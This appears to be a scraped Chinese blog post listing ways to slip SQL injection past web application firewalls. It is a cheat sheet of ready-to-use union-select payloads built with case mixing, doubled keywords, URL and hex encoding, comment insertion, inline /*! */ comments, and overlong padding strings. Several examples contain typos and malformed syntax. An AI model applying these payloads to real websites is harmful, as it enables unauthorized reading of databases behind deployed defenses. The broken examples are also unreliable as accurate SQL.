zoukankan      html  css  js  c++  java
  • 11.1 SQL注入过WAF的一些方式

    SQL注入过WAF

    WAF web应用防护系统,也叫web防火墙

    WAF基本功能:

    1、大小写 select * from users where id =1 uNion SelEcT 1,2,3,4--+

    2、替换关键字(关键字重复写) select*from users where ID=1 ununionion selselectect1,2,3,4%23

    3、编码 select*from user where id=2%2bunion%2bselect%2b1,2,3,4--+

    Union--->0x756e696f6e20

    Select*from users where ID=1 %75nion select 1,2,3,4%23

    4、注释符号 /**/  union/**/select/**/1,2,3%23

    5、等价函数替换 version() @@version mid substr substring

    6、特殊符号 select version();  @符号,select @......1.from users;
    +  #  %23  --+   \\

    7、内联注释加!  selecct*from users where id=1/*!union*//**//*!select*//**/1,2,3,4--+

     

     

    分块传输过WAF

     

    超长字符过WAF

     

    有些WAF在接收到超长字符的时候没办法及时处理,会直接交付给后端(php环境),让其处理

     

    8、缓冲区溢出
    ?id=1 and (select  1)=(select  0xA*1000)  uNiOn SeLeCt 1,2 version(),4,5database(),version(),8,9,10,11,12,13,14,15,16,17,18
    (这里0xAA重复1000次)

  • 相关阅读:
    功能测试
    数据库
    loadrunner
    笔记
    基础知识
    类方法, 实例方法, 静态方法
    统计英文单词次数
    合并文件内容
    字典排序
    排序算法
  • 原文地址:https://www.cnblogs.com/x98339/p/11813577.html
Copyright © 2011-2022 走看看